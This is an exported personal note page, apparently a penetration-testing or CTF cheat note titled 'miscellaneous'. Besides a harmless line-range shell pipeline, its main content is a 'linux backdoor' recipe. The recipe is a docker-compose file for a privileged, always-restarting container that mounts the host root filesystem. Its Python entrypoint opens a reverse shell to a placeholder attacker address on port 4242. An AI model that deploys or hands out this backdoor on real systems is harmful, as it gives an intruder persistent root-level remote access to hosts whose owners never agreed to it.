<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../style.css">
    <base target="_parent">
    <title data-trilium-title>miscellaneous</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>miscellaneous</h1>

      <div class="ck-content">
        <p>for selecting a range of lines in a file</p>
        <p><code>cat word.txt | head -1000 | tail -500 | tee &lt;new-file.txt&gt;exec</code>

        </p>
        <p>linux backdoor:</p>
        <p>create <code>docker-compose.yml</code> with the following and run <code>docker up</code> to
          start it.</p><pre><code class="language-text-plain">---
version: "2.1"
services:
  backdoorservice:
    restart: always
    image: ghcr.io/jroo1053/ctfscore:master
    entrypoint: &gt; 
       python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
       s.connect(("&lt;ATTACKBOXIP&gt;",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);
       pty.spawn("/bin/sh")'
    volumes:
      - /:/mnt
    privileged: true</code></pre>
      </div>
    </div>
  </body>

</html>